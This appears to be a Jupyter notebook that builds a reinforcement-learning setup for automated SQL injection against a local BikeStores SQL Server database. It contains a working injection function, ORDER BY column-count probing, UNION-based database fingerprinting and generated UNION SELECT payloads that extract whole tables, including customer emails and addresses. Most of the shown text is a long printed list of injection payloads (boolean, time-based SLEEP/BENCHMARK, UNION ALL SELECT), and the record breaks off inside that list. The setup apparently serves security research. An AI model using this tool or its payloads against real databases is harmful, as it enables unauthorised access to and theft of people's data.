**DATABASE CONFIGURATION**

In [772]:
from sqlalchemy.engine import URL
from sqlalchemy import create_engine
import numpy as np
import tensorflow as tf
from tensorflow import keras
from keras import layers
import pandas as pd
import numpy as np
import json
import sys
from enum import Enum

Load Configuration File

In [773]:
with open('config.json', 'r') as config_file:
    config = json.load(config_file)
    print(config)

{'database': {'name': 'BikeStores', 'server': '.\\SQLEXPRESS', 'driver': 'SQL Server', 'sample_query': 'SELECT * FROM production.brands'}, 'rl': {'state_info': {'mark_error': True, 'query_result_length': 100, 'padding_char': '\x00'}, 'contexts': [{'query': "SELECT * FROM production.products WHERE brand_id='[INPUT]' AND category_id=8", 'table_filter': ['production.products'], 'column_filter': ['product_name'], 'goal': 'Trek 820 - 2016'}, {'query': "SELECT * FROM sales.customers WHERE email='[INPUT]'", 'table_filter': ['sales.customers'], 'column_filter': ['email'], 'goal': 'debra.burks@yahoo.com'}]}}

Set Up Connection to Microsoft SQL Database

In [774]:
db = config['database']

db_name = db['name']
db_server = db['server']
db_driver = db['driver']

# Connect to SQL database using the above parameters.
conn_string = f'DRIVER={db_driver};SERVER={db_server};DATABASE={db_name};Trusted_Connection=yes'
conn_url = URL.create('mssql+pyodbc', query={'odbc_connect': conn_string})
engine = create_engine(conn_url)

# Display a dataframe from a sample query if set.
if 'sample_query' in db:
    sample_query = db['sample_query']
    df = pd.read_sql(sample_query, engine)
    print(df)

   brand_id    brand_name
0         1       Electra
1         2          Haro
2         3        Heller
3         4   Pure Cycles
4         5       Ritchey
5         6       Strider
6         7  Sun Bicycles
7         8         Surly
8         9          Trek

Get All Tables and Columns to Define Action Space With

In [775]:
# Gather a list of every user-defined table in the database.
# TODO: Verify that every table is retrieved.
def get_tables():
    tables = []
    columns = []
    df = pd.read_sql('SELECT * FROM INFORMATION_SCHEMA.COLUMNS', engine)

    schemas = df['TABLE_SCHEMA']
    table_names = df['TABLE_NAME']
    column_names = df['COLUMN_NAME']

    prev_table = None
    for i in range(0, len(schemas)):
        if schemas[i] is not None:
            table_name = schemas[i] + '.' + table_names[i]
        else:
            table_name = table_names[i]
            
        if table_name not in tables:
            tables.append(table_name)

        last_table = tables[len(tables)-1]
        if prev_table is last_table:
            columns[len(columns)-1].append(column_names[i])
        else:
            prev_table = last_table
            columns.append([column_names[i]])
        
    return tables, columns
    
tables, columns = get_tables()
tables, columns

(['production.categories',
  'production.brands',
  'production.products',
  'sales.customers',
  'sales.stores',
  'sales.staffs',
  'sales.orders',
  'sales.order_items',
  'production.stocks'],
 [['category_id', 'category_name'],
  ['brand_id', 'brand_name'],
  ['product_id',
   'product_name',
   'brand_id',
   'category_id',
   'model_year',
   'list_price'],
  ['customer_id',
   'first_name',
   'last_name',
   'phone',
   'email',
   'street',
   'city',
   'state',
   'zip_code'],
  ['store_id',
   'store_name',
   'phone',
   'email',
   'street',
   'city',
   'state',
   'zip_code'],
  ['staff_id',
   'first_name',
   'last_name',
   'email',
   'phone',
   'active',
   'store_id',
   'manager_id'],
  ['order_id',
   'customer_id',
   'order_status',
   'order_date',
   'required_date',
   'shipped_date',
   'store_id',
   'staff_id'],
  ['order_id', 'item_id', 'product_id', 'quantity', 'list_price', 'discount'],
  ['store_id', 'product_id', 'quantity']])

Define State Configuration

In [776]:
state_info_config = config['rl']['state_info']
mark_error = state_info_config['mark_error']
query_result_length = state_info_config['query_result_length']
padding_char = state_info_config['padding_char']
error_char = 'y'
no_error_char = 'n'

Define RL Contexts and Incrementation

In [777]:
contexts = config['rl']['contexts']

# Increments RL context and returns whether another context was assigned.
def increment_context():
    global context, context_index
    if context_index < len(contexts) - 1:
        context_index += 1
        context = contexts[context_index]

# Not having any defined RL contexts will result in an error.
def reset_context():
    global context, context_index
    context = contexts[0]
    context_index = 0

reset_context()

Create SQL Injection Attack Capability

In [778]:
def inject_payload(payload, context=context):
    # Finds [INPUT] within the context query configuration and replaces it with the payload.
    query = context['query']
    query = query.replace('[INPUT]', payload)
    # Runs SQL injection query.
    return pd.read_sql(query, engine)

Enumerate SQL Database Types

In [779]:
class DBType(Enum):
    MSSQL = 0
    MySQL = 1
    Oracle = 2
    PostgeSQL = 3

Gets Column Counts for Each Context

In [780]:
# Column counts for table returned by each context.
#
# PostgreSQL tables can have no columns.
# Source: https://stackoverflow.com/questions/2438321/create-a-table-without-columns#:~:text=A%20table%20is%20a%20collection,need%20at%20least%20one%20column.&text=in%20postgresql%20you%20can%20indeed%20create%20tables%20without%20columns.
context_col_counts = [0 for c in contexts]

for i in range(0, len(contexts)):
    # Finds column counts for each context by iterating using ORDER BY until an error occurs.
    #
    # Max possible number of SQL columns is 30,000, so this loop should always break.
    # IBM source: https://www.ibm.com/support/pages/filenet-content-manager-ms-sql-server-database-table-limitations-columns-and-row-size#:~:text=the%20object%20store.-,Answer,30%2C000%20columns%20instead%20of%201024.
    while True:
        payload = f'\' ORDER BY {context_col_counts[i]+1}--'
        try:
            df = inject_payload(payload, contexts[i])
            context_col_counts[i] += 1
        except:
            break

Tries to Retrieve Database Type by Injecting Version UNION Payloads

In [781]:
# With the number of columns gathered, we can perform UNION statements to find the
# SQL database type and version. To achieve this, we must find a String column for
# the version information to be returned in.
#
# Database version payloads are for Microsoft and MySQL, Oracle, and PostgreSQL respectively.
# Retreived from: https://portswigger.net/web-security/sql-injection/examining-the-database
db_suffixes = ['@@version', '* FROM v$version', 'version()']
db_type = None
col_count0 = context_col_counts[0]
for suffix in db_suffixes:
    for i in range(0, col_count0):
        payload = '\' UNION SELECT '
        for j in range(0, col_count0):
            if i != j:
                payload += 'NULL'
            else:
                payload += suffix
            if j != col_count0 - 1:
                payload += ','
            else:
                payload += '--'
        try:
            df = inject_payload(payload)
            res = df.iloc[-1,i]
            if suffix == db_suffixes[0]:
                if 'Microsoft SQL Server' in res:
                    db_type = DBType.MSSQL
                else:
                    db_type = DBType.MySQL
            elif suffix == db_suffixes[1]:
                db_type == DBType.Oracle
            elif suffix == db_suffixes[2]:
                db_type = DBType.PostgeSQL
            break
        except:
            continue

# TODO: Use DB type to filter action space.
print(db_type)

DBType.MSSQL

**REINFORCEMENT LEARNING**

Create Action Space

In [782]:
# Payloads extracted from generic error and union sections from: https://github.com/payloadbox/sql-injection-payload-list
# TODO: Remove non-MSSQL payloads.
payloads = open('sqli_payloads.txt', 'r').read().split('\n')

for context_col_count in context_col_counts:
    for i in range(0, len(tables)):
        payload = '\' UNION SELECT '
        table = tables[i]
        table_columns = columns[i]
        table_col_count = len(table_columns)

        for i in range(0, context_col_count):
            if i < table_col_count:
                payload += table_columns[i]
            else:
                payload += 'NULL'
            if i < context_col_count - 1:
                payload += ', '
        
        payload += f' FROM {table}--'
        payloads.append(payload)

payloads

["' OR 1=1",
 "' OR 1=0",
 "' OR x=x",
 "' OR x=y",
 "' OR 1=1#",
 "' OR 1=0#",
 "' OR x=x#",
 "' OR x=y#",
 "' OR 1=1-- ",
 "' OR 1=0-- ",
 "' OR x=x-- ",
 "' OR x=y-- ",
 "' OR 3409=3409 AND ('pytW' LIKE 'pytW",
 "' OR 3409=3409 AND ('pytW' LIKE 'pytY",
 "' HAVING 1=1",
 "' HAVING 1=0",
 "' HAVING 1=1#",
 "' HAVING 1=0#",
 "' HAVING 1=1-- ",
 "' HAVING 1=0-- ",
 "' AND 1=1",
 "' AND 1=0",
 "' AND 1=1-- ",
 "' AND 1=0-- ",
 "' AND 1=1#",
 "' AND 1=0#",
 "' AND 1=1 AND '%'='",
 "' AND 1=0 AND '%'='",
 "' AND 1083=1083 AND (1427=1427",
 "' AND 7506=9091 AND (5913=5913",
 "' AND 1083=1083 AND ('1427=1427",
 "' AND 7506=9091 AND ('5913=5913",
 "' AND 7300=7300 AND 'pKlZ'='pKlZ",
 "' AND 7300=7300 AND 'pKlZ'='pKlY",
 "' AND 7300=7300 AND ('pKlZ'='pKlZ",
 "' AND 7300=7300 AND ('pKlZ'='pKlY",
 "' AS INJECTX WHERE 1=1 AND 1=1",
 "' AS INJECTX WHERE 1=1 AND 1=0",
 "' AS INJECTX WHERE 1=1 AND 1=1#",
 "' AS INJECTX WHERE 1=1 AND 1=0#",
 "' AS INJECTX WHERE 1=1 AND 1=1--",
 "' AS INJECTX WHERE 1=1 AND 1=0--",
 "' WHERE 1=1 AND 1=1",
 "' WHERE 1=1 AND 1=0",
 "' WHERE 1=1 AND 1=1#",
 "' WHERE 1=1 AND 1=0#",
 "' WHERE 1=1 AND 1=1--",
 "' WHERE 1=1 AND 1=0--",
 "' ORDER BY 1-- ",
 "' ORDER BY 2-- ",
 "' ORDER BY 3-- ",
 "' ORDER BY 4-- ",
 "' ORDER BY 5-- ",
 "' ORDER BY 6-- ",
 "' ORDER BY 7-- ",
 "' ORDER BY 8-- ",
 "' ORDER BY 9-- ",
 "' ORDER BY 10-- ",
 "' ORDER BY 11-- ",
 "' ORDER BY 12-- ",
 "' ORDER BY 13-- ",
 "' ORDER BY 14-- ",
 "' ORDER BY 15-- ",
 "' ORDER BY 16-- ",
 "' ORDER BY 17-- ",
 "' ORDER BY 18-- ",
 "' ORDER BY 19-- ",
 "' ORDER BY 20-- ",
 "' ORDER BY 21-- ",
 "' ORDER BY 22-- ",
 "' ORDER BY 23-- ",
 "' ORDER BY 24-- ",
 "' ORDER BY 25-- ",
 "' ORDER BY 26-- ",
 "' ORDER BY 27-- ",
 "' ORDER BY 28-- ",
 "' ORDER BY 29-- ",
 "' ORDER BY 30-- ",
 "' ORDER BY 31337-- ",
 "' ORDER BY 1# ",
 "' ORDER BY 2# ",
 "' ORDER BY 3# ",
 "' ORDER BY 4# ",
 "' ORDER BY 5# ",
 "' ORDER BY 6# ",
 "' ORDER BY 7# ",
 "' ORDER BY 8# ",
 "' ORDER BY 9# ",
 "' ORDER BY 10# ",
 "' ORDER BY 11# ",
 "' ORDER BY 12# ",
 "' ORDER BY 13# ",
 "' ORDER BY 14# ",
 "' ORDER BY 15# ",
 "' ORDER BY 16# ",
 "' ORDER BY 17# ",
 "' ORDER BY 18# ",
 "' ORDER BY 19# ",
 "' ORDER BY 20# ",
 "' ORDER BY 21# ",
 "' ORDER BY 22# ",
 "' ORDER BY 23# ",
 "' ORDER BY 24# ",
 "' ORDER BY 25# ",
 "' ORDER BY 26# ",
 "' ORDER BY 27# ",
 "' ORDER BY 28# ",
 "' ORDER BY 29# ",
 "' ORDER BY 30#",
 "' ORDER BY 31337#",
 "' ORDER BY 1 ",
 "' ORDER BY 2 ",
 "' ORDER BY 3 ",
 "' ORDER BY 4 ",
 "' ORDER BY 5 ",
 "' ORDER BY 6 ",
 "' ORDER BY 7 ",
 "' ORDER BY 8 ",
 "' ORDER BY 9 ",
 "' ORDER BY 10 ",
 "' ORDER BY 11 ",
 "' ORDER BY 12 ",
 "' ORDER BY 13 ",
 "' ORDER BY 14 ",
 "' ORDER BY 15 ",
 "' ORDER BY 16 ",
 "' ORDER BY 17 ",
 "' ORDER BY 18 ",
 "' ORDER BY 19 ",
 "' ORDER BY 20 ",
 "' ORDER BY 21 ",
 "' ORDER BY 22 ",
 "' ORDER BY 23 ",
 "' ORDER BY 24 ",
 "' ORDER BY 25 ",
 "' ORDER BY 26 ",
 "' ORDER BY 27 ",
 "' ORDER BY 28 ",
 "' ORDER BY 29 ",
 "' ORDER BY 30 ",
 "' ORDER BY 31337 ",
 "' RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
 "' RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
 "' IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--",
 "' IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--",
 "' %' AND 8310=8310 AND '%'='",
 "' %' AND 8310=8311 AND '%'='",
 "' ORDER BY SLEEP(5)",
 "' ORDER BY 1,SLEEP(5)",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30",
 "' ORDER BY SLEEP(5)#",
 "' ORDER BY 1,SLEEP(5)#",
 "' ORDER BY 1,SLEEP(5),3#",
 "' ORDER BY 1,SLEEP(5),3,4#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#",
 "' ORDER BY SLEEP(5)-- ",
 "' ORDER BY 1,SLEEP(5)-- ",
 "' ORDER BY 1,SLEEP(5),3-- ",
 "' ORDER BY 1,SLEEP(5),3,4-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- ",
 "' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- ",
 "' UNION ALL SELECT 1",
 "' UNION ALL SELECT 1,2",
 "' UNION ALL SELECT 1,2,3",
 "' UNION ALL SELECT 1,2,3,4",
 "' UNION ALL SELECT 1,2,3,4,5",
 "' UNION ALL SELECT 1,2,3,4,5,6",
 "' UNION ALL SELECT 1,2,3,4,5,6,7",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30",
 "' UNION ALL SELECT 1#",
 "' UNION ALL SELECT 1,2#",
 "' UNION ALL SELECT 1,2,3#",
 "' UNION ALL SELECT 1,2,3,4#",
 "' UNION ALL SELECT 1,2,3,4,5#",
 "' UNION ALL SELECT 1,2,3,4,5,6#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#",
 "' UNION ALL SELECT 1-- ",
 "' UNION ALL SELECT 1,2-- ",
 "' UNION ALL SELECT 1,2,3-- ",
 "' UNION ALL SELECT 1,2,3,4-- ",
 "' UNION ALL SELECT 1,2,3,4,5-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- ",
